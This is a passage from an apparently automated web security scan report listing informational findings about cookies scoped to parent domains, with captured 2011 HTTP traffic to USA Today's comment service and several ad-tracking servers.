GET /ver1.0/sys/jsonp.app?widget_path=usat/pluck/comments.app&plckcommentonkeytype=article&plckcommentonkey=46732364.story&plckarticleurl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&plckarticletitle=Levee%2520blasted%2520along%2520Mississippi%2520River%2520to%2520spare%2520Cairo%252C%2520Ill.&clientUrl=http%3A%2F%2Fwww.usatoday.com%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm&cb=plcb0 HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072

Response

HTTP/1.1 200 OK
Set-Cookie: usatprod=R1449692072; path=/
Cache-Control: private
Content-Type: application/javascript
Vary: Content-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Date: Mon, 09 May 2011 15:38:33 GMT
Connection: close
Content-Length: 94369

plcb0('\r\n\r\n<div class=\"pluck-app-processing\" style=\"font-size: 0.7em; font-family: Calibri, \'Lucida Sans Unicode\', \'Lucida Grande\', \'Lucida Sans\', Arial, sans-serif; text-align: center;\"
...[SNIP]...

10.48. http://sitelife.usatoday.com/ver1.0/usat/pluck/comments/comments.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/comments/comments.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/usat/pluck/comments/comments.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; SiteLifeHost=gnvm3l3pluckcom; usatprod=R1449692072
If-Modified-Since: Mon, 09 May 2011 08:27:57 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Connection: close
Date: Mon, 09 May 2011 15:38:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Content-Encoding: deflate
Content-Length: 0
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Cache-Control: public
Last-Modified: Mon, 09 May 2011 08:27:57 GMT
ETag: "4889D0CFAF8896B1003B735074638083"
Content-Type: text/html


10.49. http://sitelife.usatoday.com/ver1.0/usat/pluck/pluck.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sitelife.usatoday.com
Path:   /ver1.0/usat/pluck/pluck.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ver1.0/usat/pluck/pluck.js HTTP/1.1
Host: sitelife.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304954843536; usat_dslv=First%20Visit%20or%20cookies%20not%20supported; anonId=738fba5a-f6a4-4f61-abc5-79a3e9b15bf3; USATINFO=Handle%3D; s_cc=true; s_pv=usat%20%3A%2Fweather%2Ffloods%2F2011-05-02-ohio-mississippi-river-floods_n.htm; s_ppv=0; s_sq=%5B%5BB%5D%5D; rsi_seg=; rsi_segs=D08734_70008|J06575_10245|J06575_10396|D08734_72078; usatprod=R1449692072; SiteLifeHost=gnvm3l3pluckcom
If-Modified-Since: Mon, 09 May 2011 08:27:57 GMT

Response

HTTP/1.1 304 Not Modified
Set-Cookie: usatprod=R1449692072; path=/
Connection: close
Date: Mon, 09 May 2011 15:38:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: gnvm3l3pluckcom
Content-Encoding: deflate
Content-Length: 0
Set-Cookie: SiteLifeHost=gnvm3l3pluckcom; domain=usatoday.com; path=/
Cache-Control: public
Last-Modified: Mon, 09 May 2011 08:27:57 GMT
ETag: "3CCDE5EE851A7D416FF8A4E14DAD9DB7"
Content-Type: text/html


10.50. http://syndication.mmismm.com/tntwo.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fwww.csmonitor.com%2FBusiness&r=&t=300 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=csmonitor
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:00 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--; expires=Sun, 08-May-2016 21:35:00 GMT; path=/; domain=.mmismm.com
Content-Length: 62
Content-Type: text/javascript

var msegs='AG=1;AK=1;AM=1;AQ=1';Mindset.handleResponse(msegs);

10.51. http://tacoda.at.atwola.com/rtx/r.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=AAU&si=18181&pi=L&xs=3&pu=http%253A//www.fox8live.com/business/default.aspx%253Fifu%253D&df=1&v=5.5&cb=58882 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1305554387|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; eadx=x

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:06 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 15:52:06 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 15:37:06 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387; path=/; expires=Mon, 16-May-11 15:37:06 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955426^1304957226|18181^1304955426^1304957226; path=/; expires=Mon, 09-May-11 16:07:06 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|56987|56835|56681|56761|56988|50213|56780|56232|50220; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde,cce56ea51bb938bc8d726cc79d6aee7f; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NTY5ODc6NTY4MzU6NTY2ODE6NTY3NjE=; expires=Thu, 03-May-12 15:37:06 GMT; path=/; domain=.at.atwola.com
Cteonnt-Length: 312
Content-Type: application/x-javascript
Content-Length: 312

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|
...[SNIP]...

10.52. http://tags.bluekai.com/site/3775

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3775

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3775 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bkst=KJh5Dn+v96WD7uvQZ1x/kAvyLcHC775Zy1/RRNx1/DjEvokk+QAAH5iLVwLayPIyWzPs6W/DhP5oTp5Rt9QV++bLEUY3ylkypo61rjAiInRZUtLjzG5TQLE5EgKU5JKEHbErAPGQ/4B1DmRe6VjH/1mte3pHB/C9Qa1HGhbQ7wG4dFpYzyUuO2GTaXM/3XOHOGcNpC+F39x3CCd7bcXqgNuaVbuIAJGkxk190TUDiiZCxYifkf+srj95u00kiPGtEDCZej49BjzvBmBQkkw8veLbzVqhY4WhT7kisTtezvKrT7VI65RgcEZGB77ExCpP3dlZSFZ7K/7KWdEmAUvo63pDVQNSijw+03qrhdFQuGBIrBqgo/w0rPcf3aDRG1h0gQtrRsqTKRj01D2/MiHNf8nuG5y5+9qC2yF0fd7HWQtQ7Jvv1Gf4uvZpDzM9mmkLsWaG7bXr6cLbdKdZU2oJqNL=; bk=uBEq2hA+ZqtVIHOf; bkc=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; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:35:47 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=HEYMqHA+ZqtVIHOf; expires=Sat, 05-Nov-2011 15:35:47 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=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; expires=Sat, 05-Nov-2011 15:35:47 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 15:35:47 GMT; path=/; domain=.bluekai.com
BK-Server: d08b
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

10.53. http://tags.bluekai.com/site/3869

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3869

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3869 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2895566;type=subsc017;cat=subsc432;u1=dallas;u2=;ord=586505138780.9218?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bk=rWh9VOA+ZqtVIHOf; bkc=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; bkst=KJh5Dn+v96WD7uvQZ1x/kAvyLcHC775Zy1/RRNx1/DjEvokk+QAAH5iLVwLayPIyWzPs6W/DhP5oTp5Rt9QV++bLEUY3ylkypo61rjAiInRZUtLjzG5TQLE5EgKU5JKEHbErAPGQ/4B1DmRe6VjH/1mte3pHB/C9Qa1HGhbQ7wG4dFpYzyUuO2GTaXM/3XOHOGcNpC+F39x3CCd7bcXqgNuaVbuIAJGkxk190TUDiiZCxYifkf+srj95u00kiPGtEDCZej49BjzvBmBQkkw8veLbzVqhY4WhT7kisTtezvKrT7VI65RgcEZGB77ExCpP3dlZSFZ7K/7KWdEmAUvo63pDVQNSijw+03qrhdFQuGBIrBqgo/w0rPcf3aDRG1h0gQtrRsqTKRj01D2/MiHNf8nuG5y5+9qC2yF0fd7HWQtQ7Jvv1Gf4uvZpDzM9mmkLsWaG7bXr6cLbdKdZU2oJqNL=; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 15:35:40 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 15:35:40 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=uBEq2hA+ZqtVIHOf; expires=Sat, 05-Nov-2011 15:35:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=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; expires=Sat, 05-Nov-2011 15:35:40 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 15:35:40 GMT; path=/; domain=.bluekai.com
BK-Server: c45a
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

10.54. http://trgc.opt.fimserve.com/fp.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgc.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=738-002553&rnd=555853643077 HTTP/1.1
Host: trgc.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:19 GMT
Content-Type: image/gif
Content-Length: 43
Connection: keep-alive
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;

10.55. http://trgca.opt.fimserve.com/fp.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trgca.opt.fimserve.com
Path:   /fp.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /fp.gif?pixelid=287-036699&diresu=154dab7990adc1d6f3372c12 HTTP/1.1
Host: trgca.opt.fimserve.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7108-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pfuid=ClIoKE2reZYP+mCeX9sXAg==; ssrtb=0; UI="2a8dbca1b98673a117|79973.9.-5.fh.wx.f.488@@gc@@dzhsrmtglm@@-4_9@@hlugozbvi gvxsmloltrvh rmx_@@xln@@nrw zgozmgrx"; LO=00Oj63Jim1.00GK000h0W3NTAEE0; TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Content-Length: 43
Server: PR/1.4.0.0/0.7.61
P3P: policyref="http://www.fimserve.com/w3c/p3p.xml",CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR DELa SAMa UNRa OTRa IND UNI PUR NAV INT DEM CNT PRE"
Cache-Control: no-cache, no-store
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Date: Mon, 09 May 2011 15:36:59 GMT
Connection: close
Set-Cookie: TRG=NDAuMT04NTU1JjM5LjQ9ODEyNCY=; domain=.fimserve.com; path=/; expires= Wednesday, 22-Apr-2020 12:22:20 GMT

GIF89a.............!.......,...........L..;

10.56. http://va.px.invitemedia.com/adnxs_imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /adnxs_imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adnxs_imp?returnType=image&key=AdImp&cost=3.260000&creativeID=113105&message=eJwtizsOgEAIBa.yobYAHp9dz7SxszLeXUisZiYPHgLoHMGSxyBou6yYUiUV5OwBnsoIW2G8FNSXvaUrZ1e_adF_WvG69y6NUjOX9wMmshRf&managed=false HTTP/1.1
Host: va.px.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=728&height=90&pb=280&cb=2507990&referrer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304954972+ \"3\": 1304949631+ \"2\": 1304949608+ \"5\": 1304954981+ \"4\": 1304954975}"; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"305463\": [1304954979+ \"TcgIWwAA4cwK5XYbhZ89pw==\"+ 68726+ 28276+ 7]+ \"496804\": [1304949631+ \"38b398f7-1050-309a-8cf3-f8e907efb2ee\"+ 22032+ 89819+ 8978]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"593713\": [1304954981+ \"b1b28b6c-217b-3042-a1c2-034ed9feb47d\"+ 8863+ 40494+ 620]+ \"305461\": [1304954972+ \"TcgIVwAOsfgK5TphlDlaOA==\"+ 68731+ 28276+ 7]+ \"448473\": [1304949607+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1="eJzjkuG48plFgEni6YQF71gUGDUWTgTSBowWYD6XDMeFD0xA2cdgWSaNO5uXAmWZLO5AZb9/YxZglPj/bD5Y7//jC8F6wXyg7OwbINnnUNn2+RCTwXwuEY6VZ1mBsp3f24CyDBoMBgwWDEDRewdYgfZtufDrLbLoK7Abny36gSK6Yj7IhMl9p1FEd94H2Tpr/lqEKAB9a00/"; io_freq_p1="eJzjkuY4HijAIvF0woJ3LAqMGgsnAmkDRgswn0ucY7e1AJPEY7AkgwaDAZPFHajEAhegxP9n8+ESz0FsLmGOqxECjBKd39ugEgwWDEDB9a5A1Vsu/HqLLLgtFKhyct9pFMG9LkDBWfPXIgQB0Zcv8g=="; 
partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; 